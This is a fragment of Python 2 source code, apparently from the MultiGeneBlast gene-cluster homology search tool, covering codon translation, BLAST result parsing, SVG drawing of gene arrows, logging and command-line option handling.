'GTC': 'V', 'GCC': 'A', 'GAC': 'D', 'GGC': 'G',
'GTA': 'V', 'GCA': 'A', 'GAA': 'E', 'GGA': 'G',
'GTG': 'V', 'GCG': 'A', 'GAG': 'E', 'GGG': 'G',
'ttt': 'F', 'tct': 'S', 'tat': 'Y', 'tgt': 'C',
'ttc': 'F', 'tcc': 'S', 'tac': 'Y', 'tgc': 'C',
'tta': 'L', 'tca': 'S', 'taa': '*', 'tga': '*',
'ttg': 'L', 'tcg': 'S', 'tag': '*', 'tgg': 'W',
'ctt': 'L', 'cct': 'P', 'cat': 'H', 'cgt': 'R',
'ctc': 'L', 'ccc': 'P', 'cac': 'H', 'cgc': 'R',
'cta': 'L', 'cca': 'P', 'caa': 'Q', 'cga': 'R',
'ctg': 'L', 'ccg': 'P', 'cag': 'Q', 'cgg': 'R',
'att': 'I', 'act': 'T', 'aat': 'N', 'agt': 'S',
'atc': 'I', 'acc': 'T', 'aac': 'N', 'agc': 'S',
'ata': 'I', 'aca': 'T', 'aaa': 'K', 'aga': 'R',
'atg': 'M', 'acg': 'T', 'aag': 'K', 'agg': 'R',
'gtt': 'V', 'gct': 'A', 'gat': 'D', 'ggt': 'G',
'gtc': 'V', 'gcc': 'A', 'gac': 'D', 'ggc': 'G',
'gta': 'V', 'gca': 'A', 'gaa': 'E', 'gga': 'G',
'gtg': 'V', 'gcg': 'A', 'gag': 'E', 'ggg': 'G'}
triplets = []
triplet = ""
a = 0
for i in sequence:
if a < 2:
a += 1
triplet = triplet + i
elif a == 2:
triplet = triplet + i
triplets.append(triplet)
triplet = ""
a = 0
protseq = ""
aanr = 0
for i in triplets:
aanr += 1
if aanr == 1:
protseq = protseq + "M"
else:
if "n" in i or "N" in i or i not in transldict.keys():
protseq = protseq + "X"
else:
protseq = protseq + transldict[i]
if len(protseq) > 0 and protseq[-1] == "*":
protseq = protseq[:-1]
return protseq
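#Example (doctest-style, illustrative only):
# translate("ATGGCCTAA") -> "MA"
#The first codon is always emitted as "M", unknown or ambiguous codons become "X",
#and a trailing stop codon ("*") is stripped.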
def writefasta(names,seqs,file):
e = 0
f = len(names) - 1
try:
out_file = open(file,"w")
while e <= f:
out_file.write(">")
out_file.write(names[e])
out_file.write("\n")
out_file.write(seqs[e])
out_file.write("\n")
e += 1
out_file.close()
except(IOError,OSError,NotImplementedError):
print >> sys.stderr, "FASTA file not created."
def testaccession(accession):
#Test if accession number is probably real GenBank/RefSeq acc nr
numbers = range(0,10)
letters = []
for i in ascii_letters:
letters.append(i)
nrnumbers = 0
nrletters = 0
for i in accession:
if i in letters:
nrletters += 1
try:
j = int(i)
if j in numbers:
nrnumbers += 1
except:
pass
test = "y"
if nrnumbers < 3 or nrletters < 1:
test = "n"
return test
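#Example (doctest-style, illustrative only):
# testaccession("AB123456") -> "y" (at least one letter and three digits)
# testaccession("orf1") -> "n"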
def sortdictkeysbyvalues(dict):
items = [(value, key) for key, value in dict.items()]
items.sort()
return [key for value, key in items]
def sortdictvaluesbykeys(dict):
items = [(key, value) for key, value in dict.items()]
items.sort()
return [value for key, value in items]
def sortdictkeysbyvaluesrev(dict):
items = [(value, key) for key, value in dict.items()]
items.sort()
items.reverse()
return [key for value, key in items]
def sortdictkeysbyvaluesrevv(dict):
items = [(value, key) for key, value in dict.items()]
items.sort()
items.reverse()
return [value for value, key in items]
def blastparse(blasttext, minseqcoverage, minpercidentity, seqlengths, seqdict, dbname, dbtype):
blastdict = {}
querylist = []
blastlines = blasttext.split("\n")[:-1]
#Filter for best blast hits (of one query on each subject)
query_subject_combinations = []
blastlines2 = []
for i in blastlines:
tabs = i.split("\t")
query = tabs[0]
subject = tabs[1]
query_subject_combination = query + "_" + subject
if query_subject_combination in query_subject_combinations:
pass
else:
query_subject_combinations.append(query_subject_combination)
blastlines2.append(i)
blastlines = blastlines2
frame_update()
#Filters blastlines to get rid of hits that do not meet criteria
blastlines2 = []
for i in blastlines:
tabs = i.split("\t")
query = tabs[0]
subject = tabs[1]
perc_ident = int(tabs[2].split(".")[0])
alignmentlength = float(tabs[3])
evalue = str(tabs[10])
blastscore = int(tabs[11].split(".")[0])
if seqlengths.has_key(query):
perc_coverage = (float(tabs[3]) / seqlengths[query]) * 100
else:
perc_coverage = 0
print seqlengths
print "Error: no sequence length found for", query
sys.exit()
if perc_ident > minpercidentity and (perc_coverage > minseqcoverage or alignmentlength > 40):
blastlines2.append(i)
blastlines = blastlines2
#Goes through the blastlines. For each query, creates a querydict and hitlist, and adds these to the blastdict when finding the next query
firstquery = "y"
hitnr = 1
for i in blastlines:
frame_update()
tabs = i.split("\t")
query = tabs[0]
if dbtype == "prot":
subject = tabs[1].split("|")[3].split(".")[0]
else:
subject = tabs[1] + "_" + str(hitnr)
internalblast = "n"
if subject == "+" or subject == "-":
internalblast = "y"
subject = tabs[1].split("|")[4].split(".")[0]
perc_ident = int(tabs[2].split(".")[0])
alignmentlength = float(tabs[3])
hit_start = str(tabs[8])
hit_end = str(tabs[9])
evalue = str(tabs[10])
blastscore = int(tabs[11].split(".")[0])
if seqlengths.has_key(query):
perc_coverage = (float(tabs[3]) / seqlengths[query]) * 100
else:
seqlength = len(seqdict[query.split("|")[4]])
perc_coverage = (float(tabs[3]) / seqlength) * 100
if firstquery == "y": #Only until the first blastline with good hit
if dbtype == "nucl" or testaccession(subject) == "y" or internalblast == "y":
firstquery = "n"
querylist.append(query)
subjectlist = []
querydict = {}
subjectlist.append(subject)
querydict[subject] = [perc_ident,blastscore,perc_coverage,evalue,hit_start,hit_end]
last_query = query
elif i == blastlines[-1]: #Only for the last blastline
if query not in querylist:
if dbtype == "nucl" or testaccession(subject) == "y" or internalblast == "y":
blastdict[last_query] = [subjectlist,querydict]
querylist.append(query)
subjectlist = []
querydict = {}
subjectlist.append(subject)
querydict[subject] = [perc_ident,blastscore,perc_coverage,evalue,hit_start,hit_end]
blastdict[query] = [subjectlist,querydict]
querylist.append(query)
else:
if dbtype == "nucl" or testaccession(subject) == "y" or internalblast == "y":
subjectlist.append(subject)
querydict[subject] = [perc_ident,blastscore,perc_coverage,evalue,hit_start,hit_end]
blastdict[query] = [subjectlist,querydict]
else: #For all but the first and last blastlines
if query not in querylist:
if dbtype == "nucl" or testaccession(subject) == "y" or internalblast == "y" or "genbank" not in dbname:
blastdict[last_query] = [subjectlist,querydict]
querylist.append(query)
subjectlist = []
querydict = {}
subjectlist.append(subject)
querydict[subject] = [perc_ident,blastscore,perc_coverage,evalue,hit_start,hit_end]
last_query = query
else:
if dbtype == "nucl" or testaccession(subject) == "y" or internalblast == "y" or "genbank" not in dbname:
subjectlist.append(subject)
querydict[subject] = [perc_ident,blastscore,perc_coverage,evalue,hit_start,hit_end]
hitnr += 1
return [blastdict,querylist]
def generate_rgbscheme(nr):
usablenumbers = [1,2,4,8,12,18,24,32,48,64,10000]
lengthsdict = {1:[1,1,1],2:[1,1,2],4:[1,2,2],8:[2,2,2],12:[2,2,3],18:[2,3,3],24:[3,3,3],32:[3,3,4],48:[3,4,4],64:[4,4,4]}
shortestdistance = 10000
for i in usablenumbers:
distance = i - nr
if distance >= 0:
if distance < shortestdistance:
shortestdistance = distance
closestnr = i
toohigh = "n"
if closestnr == 10000:
toohigh = "y"
closestnr = 64
xyznumbers = lengthsdict[closestnr]
x = xyznumbers[0]
y = xyznumbers[1]
z = xyznumbers[2]
xpoints = []
xpoint = (255/z)/2
for i in range(x):
xpoints.append(xpoint)
xpoint += (255/x)
ypoints = []
ypoint = (255/z)/2
for i in range(y):
ypoints.append(ypoint)
ypoint += (255/y)
zpoints = []
zpoint = (255/z)/2
for i in range(z):
zpoints.append(zpoint)
zpoint += (255/z)
colorlist = []
for i in xpoints:
for j in ypoints:
for k in zpoints:
rgb = "rgb(" + str(i) + "," + str(j) + "," + str(k) + ")"
colorlist.append(rgb)
if toohigh == "y":
colorlist = colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist + colorlist
if closestnr == 24:
colorlist = colorlist[:15] + colorlist[18:]
if closestnr == 32:
colorlist = colorlist[:21] + colorlist[24:]
colorlist2 = []
if closestnr == 1:
colorlist2.append("red")
if closestnr == 2:
colorlist2.append("red")
colorlist2.append("green")
if closestnr == 4:
colorlist2.append("red")
colorlist2.append("green")
colorlist2.append("blue")
colorlist2.append("yellow")
if closestnr == 8:
neworder=[4,1,2,5,6,7,3,0]
colorlist2 = [colorlist[i] for i in neworder]
if closestnr == 12:
neworder=[6,3,5,9,7,2,11,4,8,1,10,0]
colorlist2 = [colorlist[i] for i in neworder]
if closestnr == 18:
neworder=[9,6,2,14,15,8,12,10,3,5,7,11,4,1,16,13,0]
colorlist2 = [colorlist[i] for i in neworder]
if closestnr == 24:
neworder=[15,12,9,6,5,0,21,1,16,14,8,17,2,23,22,3,13,7,10,4,18,20,19,11]
colorlist2 = [colorlist[i] for i in neworder]
if closestnr == 32:
neworder = [21,19,27,6,8,1,14,7,20,13,9,30,4,23,18,12,5,29,24,17,11,31,2,28,22,15,26,3,20,16,10,25]
colorlist2 = [colorlist[i] for i in neworder]
if closestnr > 32:
random.shuffle(colorlist)
colorlist2 = colorlist
colorlist = colorlist2
return colorlist
def _gene_arrow(start,end,strand,color,base,height):
halfheight = height/2
if start > end:
start2 = end
end2 = start
start = start2
end = end2
oh = ShapeBuilder()
if (end - start) < halfheight:
if (strand == "+"):
pointsAsTuples=[(start,base),
(end,base - halfheight),
(start,base - height),
(start,base)
]
if (strand == "-"):
pointsAsTuples=[(start,base - halfheight),
(end,base - height),
(end,base),
(start,base - halfheight)
]
else:
if (strand == "+"):
arrowstart = end-halfheight
pointsAsTuples=[(start,base),
(arrowstart,base),
(end,base-halfheight),
(arrowstart,base - height),
(start,base - height),
(start,base)
]
if (strand == "-"):
arrowstart = start + halfheight
pointsAsTuples=[(start,base - halfheight),
(arrowstart,base - height),
(end,base - height),
(end,base),
(arrowstart,base),
(start,base - halfheight)
]
pg=oh.createPolygon(points=oh.convertTupleArrayToPoints(pointsAsTuples),strokewidth=1, stroke='black', fill=color)
return pg
def relativepositions(starts, ends, largestclustersize, screenwidth):
rel_starts = []
rel_ends = []
#Assign relative start and end sites for visualization
lowest_start = int(starts[0])
leftboundary = lowest_start
for i in starts:
i = float(float(int(i) - int(leftboundary)) / largestclustersize) * float(screenwidth * 0.75)
i = int(i)
rel_starts.append(i)
for i in ends:
i = float(float(int(i) - int(leftboundary)) / largestclustersize) * float(screenwidth * 0.75)
i = int(i)
rel_ends.append(i)
return [rel_starts,rel_ends]
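#Example (illustrative only): with starts=["0","1000"], ends=["500","2000"],
#largestclustersize=2000 and screenwidth=1000, the cluster is scaled onto 75% of the
#screen width: rel_starts=[0, 375] and rel_ends=[187, 750].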
def startendsitescheck(starts,ends):
#Check whether start sites are always lower than end sites, reverse if necessary
starts2 = []
ends2 = []
a = 0
for i in starts:
if int(i) > int(ends[a]):
starts2.append(ends[a])
ends2.append(i)
else:
starts2.append(i)
ends2.append(ends[a])
a += 1
ends = ends2
starts = starts2
return [starts,ends]
def calculate_colorgroups(queryclusternumber,hitclusternumbers,queryclusterdata,internalhomologygroupsdict):
#Extract data and generate color scheme
hitclusterdata = queryclusterdata[queryclusternumber][1]
queryclustergenes = hitclusterdata[hitclusterdata.keys()[0]][3]
colorgroupsdict = {}
colorgroupslengthlist = []
colorgroupslist = []
for hitclusternumber in hitclusternumbers:
colorgroups = hitclusterdata[hitclusternumber][0][hitclusternumber]
colorgroupsdict[hitclusternumber] = colorgroups
colorgroupslengthlist.append(len(colorgroups))
colorgroupslist.append(colorgroups)
metacolorgroups = []
internalgroups = internalhomologygroupsdict[queryclusternumber]
for i in internalgroups:
metagroup = []
for j in i:
for m in colorgroupslist:
for l in m:
if j in l:
for k in l:
if k not in metagroup:
metagroup.append(k)
if len(metagroup) > 1 and metagroup not in metacolorgroups:
metacolorgroups.append(metagroup)
#Generate RGB scheme
rgbcolorscheme = generate_rgbscheme(len(metacolorgroups))
rgbcolorscheme.append("#FFFFFF")
#Create colorschemedict in which all genes that are hits of the same query gene get the same color
colorschemedict = {}
z = 0
for i in queryclustergenes:
for j in metacolorgroups:
if i in j:
for l in j:
if colorschemedict.has_key(l):
pass
else:
colorschemedict[l] = z
if z in colorschemedict.values():
z += 1
return colorschemedict,rgbcolorscheme
def clusterblastresults(queryclusternumber,hitclusternumbers,queryclusterdata,colorschemedict,rgbcolorscheme, screenwidth, arch_search, allhits="n"):
#print "Generating svg for cluster",queryclusternumber
#Extract data and generate color scheme
nrhitclusters = queryclusterdata[1][0]
hitclusterdata = queryclusterdata[1][1]
if nrhitclusters == 0:
s = svg(x = 0, y = 0, width = (screenwidth * 0.75), height = (2770))
viewbox = "0 0 " + str(screenwidth * 0.8) + " " + str(2950)
s.set_viewBox(viewbox)
s.set_preserveAspectRatio("none")
return [s,[{},{},{}]]
queryclustergenes = hitclusterdata[hitclusterdata.keys()[0]][3]
queryclustergenesdetails = hitclusterdata[hitclusterdata.keys()[0]][4]
colorgroupsdict = {}
colorgroupslengthlist = []
colorgroupslist = []
for hitclusternumber in hitclusternumbers:
colorgroups = hitclusterdata[hitclusternumber][0][hitclusternumber]
colorgroupsdict[hitclusternumber] = colorgroups
colorgroupslengthlist.append(len(colorgroups))
colorgroupslist.append(colorgroups)
#Find out whether hit gene cluster needs to be inverted compared to query gene cluster
strandsbalancedict = {}
for m in hitclusternumbers:
hitclustergenesdetails = hitclusterdata[m][2]
strandsbalance = 0
for i in queryclustergenes:
refstrand = queryclustergenesdetails[i][2]
for j in colorgroupsdict[m]:
if i in j:
for k in j:
if k in hitclusterdata[m][1] and hitclustergenesdetails[k][2] == refstrand:
strandsbalance += 1
elif k in hitclusterdata[m][1] and hitclusterdata[m][2][k][2] != refstrand:
strandsbalance = strandsbalance - 1
strandsbalancedict[m] = strandsbalance
#Generate coordinates for SVG figure
qnrgenes = len(queryclustergenes)
qstarts =[]
qends = []
qstrands =[]
qcolors = []
for i in queryclustergenes:
qgenedata = queryclustergenesdetails[i]
if qgenedata[0] > qgenedata[1]:
qstarts.append(qgenedata[0])
qends.append(qgenedata[1])
else:
qstarts.append(qgenedata[1])
qends.append(qgenedata[0])
qstrands.append(qgenedata[2])
if colorschemedict.has_key(i):
qcolors.append(colorschemedict[i])
else:
qcolors.append("white")
qstarts_ends = startendsitescheck(qstarts,qends)
qstarts = qstarts_ends[0]
qends = qstarts_ends[1]
hdata = {}
for m in hitclusternumbers:
hitclustergenes = hitclusterdata[m][1]
hitclustergenesdetails = hitclusterdata[m][2]
hnrgenes = len(hitclustergenes)
hstarts =[]
hends = []
hstrands =[]
hcolors = []
for i in hitclustergenes:
hgenedata = hitclustergenesdetails[i]
if int(hgenedata[0]) > int(hgenedata[1]):
hstarts.append(hgenedata[0])
hends.append(hgenedata[1])
else:
hstarts.append(hgenedata[1])
hends.append(hgenedata[0])
hstrands.append(hgenedata[2])
if colorschemedict.has_key(i):
hcolors.append(colorschemedict[i])
else:
hcolors.append("white")
#Invert gene cluster if needed
if strandsbalancedict[m] < 0:
hstarts2 = []
hends2 = []
hstrands2 = []
for i in hstarts:
hstarts2.append(str(100000000 - int(i)))
hstarts = hstarts2
hstarts.reverse()
for i in hends:
hends2.append(str(100000000 - int(i)))
hends = hends2
hends.reverse()
hstarts, hends = hends, hstarts
for i in hstrands:
if i == "+":
hstrands2.append("-")
elif i == "-":
hstrands2.append("+")
hstrands = hstrands2
hstrands.reverse()
hcolors.reverse()
#Sort genes properly and remove duplicates
stranddict = {}
colorsdict = {}
y = 0
sortstarts = []
for n in hstarts:
while n in sortstarts:
n = str(int(n) + 1)
sortstarts.append(n)
for n in sortstarts:
stranddict[int(n)] = hstrands[y]
w = y + 1
try:
nextstart = sortstarts[w]
except:
nextstart = 0
color = hcolors[y]
if color == "white":
while int(nextstart) == int(n):
if len(hcolors) > w and hcolors[w] != 'white':
color = hcolors[w]
break
w += 1
try:
nextstart = sortstarts[w]
except:
break
if not colorsdict.has_key(int(n)) or colorsdict[int(n)] == "white":
colorsdict[int(n)] = color
y += 1
hstarts = [int(l) for l in hstarts]
#hstarts = dict.fromkeys(hstarts).keys()
hstarts.sort()
hstarts = [str(n) for n in hstarts]
hends = [int(l) for l in hends]
#hends = dict.fromkeys(hends).keys()
hends.sort()
hends = [str(n) for n in hends]
hstrands = sortdictvaluesbykeys(stranddict)
hcolors = sortdictvaluesbykeys(colorsdict)
hstarts_ends = startendsitescheck(hstarts,hends)
hstarts = hstarts_ends[0]
hends = hstarts_ends[1]
hdata[m] = [hstarts,hends,hstrands,hcolors]
#Resize all gene clusters to normal sizes
#Find largest hit cluster
approxclustersizes = []
for m in hitclusternumbers:
hstarts,hends,hstrands,hcolors = hdata[m]
x = 0
first = -1
last = int(hends[-1])
for n in hcolors:
if n != "white" and first == -1:
first = int(hstarts[x])
last = int(hends[x])
elif n != "white" and first != -1:
last = int(hends[x])
x += 1
approxclustersizes.append((int(last)-int(first)))
approxclustersizes.append(int(qends[-1]) - int(qstarts[0]))
largestsize = int(int(max(approxclustersizes)) + 5000)
#Resize all clusters
hdata2 = {}
savedpositions = {}
for m in hitclusternumbers:
hstarts,hends,hstrands,hcolors = hdata[m]
x = 0
first = -1
last = 0
for n in hcolors:
if n != "white" and first == -1:
first = min(int(hstarts[x]), int(hends[x]))
if max(int(hstarts[x]), int(hends[x])) > last:
last = max(int(hstarts[x]), int(hends[x]))
elif n != "white" and first != -1:
if min(int(hstarts[x]), int(hends[x])) < first:
first = min(int(hstarts[x]), int(hends[x]))
if max(int(hstarts[x]), int(hends[x])) > last:
last = max(int(hstarts[x]), int(hends[x]))
x += 1
approxclustersize = (int(last)-int(first))
piecetobeadded = (largestsize - approxclustersize) / 2
#if min([(first - int(hstarts[0])),(int(hends[-1]) - last)]) < piecetobeadded - 1:
# piecetobeadded = min([(first - int(hstarts[0])),(int(hends[-1]) - last)])
if piecetobeadded < 0:
piecetobeadded = 0
newcstart = int(first) - piecetobeadded
newcend = int(last) + piecetobeadded
firstentry = 1000000000
lastentry = -1
x = 0
for i in hstarts:
hstart = int(i)
hend = int(hends[x])
if firstentry == 1000000000 and hend >= newcstart:
firstentry = x
lastentry = x + 1
elif hstart <= newcend:
lastentry = x + 1
x += 1
#print str(cstart) + " " + str(cend) + " " + str(newcstart) + " " + str(newcend)
hstarts = hstarts[firstentry:lastentry]
hends = hends[firstentry:lastentry]
hstrands = hstrands[firstentry:lastentry]
hcolors = hcolors[firstentry:lastentry]
hdata2[m] = [hstarts,hends,hstrands,hcolors]
savedpositions[m] = [hstarts,hends]
hdata = hdata2
#Find cluster size of largest cluster of query & all hit clusters assessed
clustersizes = []
for m in hitclusternumbers:
pstarts = [int(n) for n in hdata[m][1]]
pends = [int(n) for n in hdata[m][0]]
locations = pstarts + pends
hclustersize = abs(max(locations) - min(locations))
clustersizes.append(hclustersize)
qpositions = [int(q) for q in qends] + [int(q) for q in qstarts]
qclustersize = abs(max(qpositions) - min(qpositions))
clustersizes.append(qclustersize)
largestclustersize = max(clustersizes)
#Find relative positions
qrelpositions = relativepositions(qstarts,qends,largestclustersize, screenwidth)
qrel_starts = qrelpositions[0]
qrel_ends = qrelpositions[1]
qdata = [qrel_starts,qrel_ends,qstrands,qcolors]
hdata2 = {}
qdata2 = []
q_adjusted = False
for m in hitclusternumbers:
hclustersize = int(hdata[m][1][-1]) - int(hdata[m][0][0])
hrelpositions = relativepositions(hdata[m][0],hdata[m][1],largestclustersize, screenwidth)
hrel_starts = hrelpositions[0]
hrel_ends = hrelpositions[1]
#Center-align smallest gene cluster
if largestclustersize == hclustersize:
if q_adjusted == False:
q_adjusted = True
qrel_ends2 = []
qrel_starts2 = []
for i in qrel_starts:
qrel_starts2.append(int(i) + int(float(float((largestclustersize - qclustersize) / 2.0) / largestclustersize) * float(screenwidth * 0.75)))
for i in qrel_ends:
qrel_ends2.append(int(i) + int(float(float((largestclustersize - qclustersize) / 2.0) / largestclustersize) * float(screenwidth * 0.75)))
qrel_ends = qrel_ends2
qrel_starts = qrel_starts2
else:
hrel_ends2 = []
hrel_starts2 = []
for i in hrel_starts:
hrel_starts2.append(int(i) + int(float(float((largestclustersize - hclustersize) / 2.0) / largestclustersize) * float(screenwidth * 0.75)))
for i in hrel_ends:
hrel_ends2.append(int(i) + int(float(float((largestclustersize - hclustersize) / 2.0) / largestclustersize) * float(screenwidth * 0.75)))
hrel_ends = hrel_ends2
hrel_starts = hrel_starts2
hdata2[m] = [hrel_starts,hrel_ends,hdata[m][2],hdata[m][3]]
qdata2 = [qrel_starts,qrel_ends,qdata[2],qdata[3]]
hdata = hdata2
qdata = qdata2
s = svg(x = 0, y = 0, width = (screenwidth * 0.75), height = 2770)
viewbox = "0 0 " + str(screenwidth * 0.8) + " " + str(2680)
s.set_viewBox(viewbox)
s.set_preserveAspectRatio("none")
#Add line behind query gene cluster gene arrows, except for architecture searches
oh = ShapeBuilder()
if arch_search == "n":
group = g()
group.addElement(oh.createLine(10,35,10 + (screenwidth * 0.75),35, strokewidth = 1, stroke = "grey"))
s.addElement(group)
#Add query gene cluster gene arrows
a = 0
y = 0
for x in range(qnrgenes):
group = g()
#group.addElement(_gene_label(rel_starts[a],rel_ends[a],genes[a],y,screenwidth))
if qcolors[a] == "white":
group.addElement(_gene_arrow(10 + qrel_starts[a],10 + qrel_ends[a],qstrands[a],rgbcolorscheme[-1],40,10))
else:
group.addElement(_gene_arrow(10 + qrel_starts[a],10 + qrel_ends[a],qstrands[a],rgbcolorscheme[qcolors[a]],40,10))
#Can be used for domains
#group.addElement(oh.createRect(rel_starts[a],45,(rel_ends[a]-rel_starts[a]),10, strokewidth = 2, stroke = "black", fill="#237845"))
if allhits == "n":
group.set_id("q" + str(queryclusternumber) + "_" + str(hitclusternumbers[0]) + "_" + "%s"%x)
else:
group.set_id("all_" + str(queryclusternumber) + "_0_" + "%s"%x)
s.addElement(group)
if y == 0:
y = 1
elif y == 1:
y = 0
a += 1
for m in hitclusternumbers:
group = g()
group.addElement(oh.createLine(10,35 + 50 * (hitclusternumbers.index(m) + 1),10 + (screenwidth * 0.75),35 + 50 * (hitclusternumbers.index(m) + 1), strokewidth = 1, stroke = "grey"))
s.addElement(group)
#Add hit gene cluster gene arrows
hitclustergenes = hitclusterdata[m][1]
hrel_starts = hdata[m][0]
hnrgenes = len(hrel_starts)
hrel_ends = hdata[m][1]
hstrands = hdata[m][2]
hcolors = hdata[m][3]
a = 0
y = 0
for x in range(hnrgenes):
group = g()
#group.addElement(_gene_label(rel_starts[a],rel_ends[a],genes[a],y,screenwidth))
if hcolors[a] == "white":
group.addElement(_gene_arrow(10 + hrel_starts[a],10 + hrel_ends[a],hstrands[a],rgbcolorscheme[-1],40 + 50 * (hitclusternumbers.index(m) + 1),10))
else:
group.addElement(_gene_arrow(10 + hrel_starts[a],10 + hrel_ends[a],hstrands[a],rgbcolorscheme[hcolors[a]],40 + 50 * (hitclusternumbers.index(m) + 1),10))
#Can be used for domains
# group.addElement(oh.createRect(rel_starts[a],45,(rel_ends[a]-rel_starts[a]),10, strokewidth = 2, stroke = "black", fill="#237845"))
if allhits == "n":
group.set_id("h" + str(queryclusternumber) + "_" + str(m) + "_" + "%s"%x)
else:
group.set_id("all_" + str(queryclusternumber) + "_" + str(m) + "_" + "%s"%x)
s.addElement(group)
if y == 0:
y = 1
elif y == 1:
y = 0
a += 1
return [s,[qdata,hdata,strandsbalancedict,savedpositions]]
def log(message, exit=False, retcode=1, stdout=False):
    "Log to the GUI output box, or to stderr/stdout and the logfile, and optionally exit"
    if GUI == "y":
        OUTBOX.text_insert(message + "\n")
        FRAME.update()
        if exit:
            sys.exit(retcode)
    else:
        if stdout:
            print message
        else:
            print >> sys.stderr, message
        logfile = open('multigeneblast.log', 'a', 1)
        logfile.write(message + '\n')
        logfile.close()
        if exit:
            sys.exit(retcode)
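# Example usage (illustrative): log("Parsing input file...") writes the message to the
# GUI output box when GUI == "y", or to stderr plus multigeneblast.log otherwise;
# log("Fatal error", exit=True, retcode=2) additionally terminates the run with exit code 2.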
def inputinstructions():
return """MultiGeneBlast 1.1.0 arguments:
Usage: multigeneblast [options]
Options (x is an integer number)
-in <file name> : Query file name: GBK/EMBL file for homology search,
FASTA file with multiple protein sequences for
architecture search
-from <x> : Start position of query region
-to <x> : End position of query region
-genes <acc,acc;...> : Accession codes of genes constituting query
multigene module
-out <folder name> : Output folder in which results will be stored
-db <db name> : Blast database to be queried (default: genbank_mf)
-cores <x> : Number of parallel CPUs to use for threading
(default: all)
-hitspergene <x>      : Number of Blast hits per query gene to be taken
into account (default: 250).
-minseqcov <x> : Minimal % coverage of a Blast hit on hit protein
sequence to be taken into account (default: 25)
-minpercid <x> : Minimal % identity of a Blast hit on hit protein
sequence to be taken into account (default: 30)
-distancekb <x> : Maximum kb distance between two blast hits to be
counted as belonging to the same locus (default: 10)
-syntenyweight <x> : Weight of synteny conservation in hit sorting score
                        (default: 0.5)
-muscle <y/n> : generate Muscle multiple sequence alignments of
all hits of each input gene (default: n)
-outpages <x> : Maximum number of output pages (with 50 hits each)
to be generated (default: 5)"""
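# Illustrative invocations of the options documented above (file, folder and database
# names are hypothetical):
#   multigeneblast -in query.gbk -from 15000 -to 45000 -db genbank_mf -out results1 -cores 4
#   multigeneblast -in proteins.fasta -db genbank_mf -out arch_results -outpages 2
# The first is a homology search on a GenBank region; the second is an architecture
# search, which takes a multi-protein FASTA file and is incompatible with -from/-to/-genes.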
def default_options(opts):
#Implement defaults
opts.db = "genbank_mf"
opts.cores = "all"
opts.minseqcov = 25
opts.minpercid = 30
opts.screenwidth = 1024
opts.hitspergene = 250
opts.distancekb = 20000
opts.muscle = "n"
opts.startpos = "N/A"
opts.endpos = "N/A"
opts.ingenes = "N/A"
opts.pages = 5
opts.gui = "n"
opts.syntenyweight = 0.5
def invalidoptions(argument):
print "From the command line, input multigeneblast -help for more information."
if len(argument) > 0:
log("Invalid options input: %s" % argument, exit=True)
def collect_identifiers(options):
#identify option identifiers
identifiers = []
for i in options:
if i[0] == "-":
if i not in identifiers:
identifiers.append(i)
else:
invalidoptions("No '-' in given options or option given twice.")
return identifiers
def determine_cpu_nr(cores):
#Determine number of CPUs used
if cores == "all":
try:
nrcpus = multiprocessing.cpu_count()
except(IOError,OSError,NotImplementedError):
nrcpus = 1
else:
try:
nrcpus = multiprocessing.cpu_count()
except(IOError,OSError,NotImplementedError):
nrcpus = 1
if cores < nrcpus:
nrcpus = cores
return nrcpus
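# Example behaviour (illustrative numbers): on an 8-core machine determine_cpu_nr("all")
# returns 8 and determine_cpu_nr(4) returns 4; requesting more cores than available
# (e.g. 16) still returns 8, and 1 is used if multiprocessing.cpu_count() is unavailable.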
def process_identifiers(identifiers, opts, options):
infile, startpos, endpos, ingenes, outfolder = "n","n","n","n","n"
genes_tag_used = "n"
fromto_tag_used = "n"
fastafile = "n"
global CURRENTDIR
for i in identifiers:
if i == "-help" or i == "--help" or i == "-h":
print inputinstructions()
sys.exit(1)
else:
value = options[options.index(i) + 1].strip()
if i == "-from":
fromto_tag_used = "y"
if genes_tag_used == "y":
print "Please either the -from and -to tags, or the -genes tag to select genes."
invalidoptions(i)
if value.isdigit():
opts.startpos = int(value)
startpos = "y"
else:
invalidoptions(i)
elif i == "-to":
fromto_tag_used = "y"
if genes_tag_used == "y":
print "Please either the -from and -to tags, or the -genes tag to select genes."
invalidoptions(i)
if value.isdigit():
opts.endpos = int(value)
endpos = "y"
else:
invalidoptions(i)
elif i == "-genes":
genes_tag_used = "y"
if fromto_tag_used == "y":
print "Please either the -from and -to tags, or the -genes tag to select genes."
invalidoptions(i)
if "," in value:
opts.ingenes = [gene for gene in value.split(",") if gene != ""]
ingenes = "y"
else:
invalidoptions(i)
elif i == "-in":
if sys.platform == ('win32') and os.sep not in value:
value = CURRENTDIR + os.sep + value
elif os.sep not in value or value[0] != os.sep:
value = CURRENTDIR + os.sep + value
root, ext = os.path.splitext(value)
if ext.lower() not in [".gbk",".gb",".genbank",".embl",".emb",".fasta",".fas",".fa",".fna"]:
print "Please supply input file with valid GBK / EMBL extension (homology search) or FASTA extension (architecture search)."
invalidoptions(i)
if value in os.listdir(".") or (os.sep in value and os.path.exists(value.rpartition(os.sep)[0]) and value.rpartition(os.sep)[2] in os.listdir(value.rpartition(os.sep)[0])):
opts.infile = value
infile = "y"
if ext.lower() in [".fasta",".fas",".fa",".fna"]:
fastafile = "y"
else:
print "Specified input file not found..."
invalidoptions(i)
elif i == "-out":
value = value.replace(".","").replace("_","")
if not value.replace("_","").replace("_","").replace("..","").replace(os.sep,"").isalnum():
print "Not a valid output folder name. Please use alpha-numerical characters only"
invalidoptions(i)
if sys.platform == ('win32') and value.count(os.sep) == 1 and value[0] == os.sep:
invalidoptions(i)
opts.outputfolder = value
if opts.outputfolder[0] == os.sep and ".." in opts.outputfolder:
invalidoptions(i)
elif os.sep in value[0] and not os.path.exists(value.rpartition(os.sep)[0]):
invalidoptions(i)
elif os.sep in opts.outputfolder and ".." in opts.outputfolder:
startdir = CURRENTDIR
while ".." in opts.outputfolder:
if ".." not in opts.outputfolder.partition(os.sep)[0]:
invalidoptions(i)
opts.outputfolder = opts.outputfolder.partition(os.sep)[2]
startdir = startdir.rpartition(os.sep)[0]
if len(startdir) < 1:
invalidoptions(i)
if opts.outputfolder[0] == os.sep:
opts.outputfolder = startdir + opts.outputfolder
else:
opts.outputfolder = startdir + os.sep + opts.outputfolder
elif os.sep not in opts.outputfolder:
opts.outputfolder = CURRENTDIR + os.sep + opts.outputfolder
elif opts.outputfolder[0] == os.sep:
opts.outputfolder = opts.outputfolder
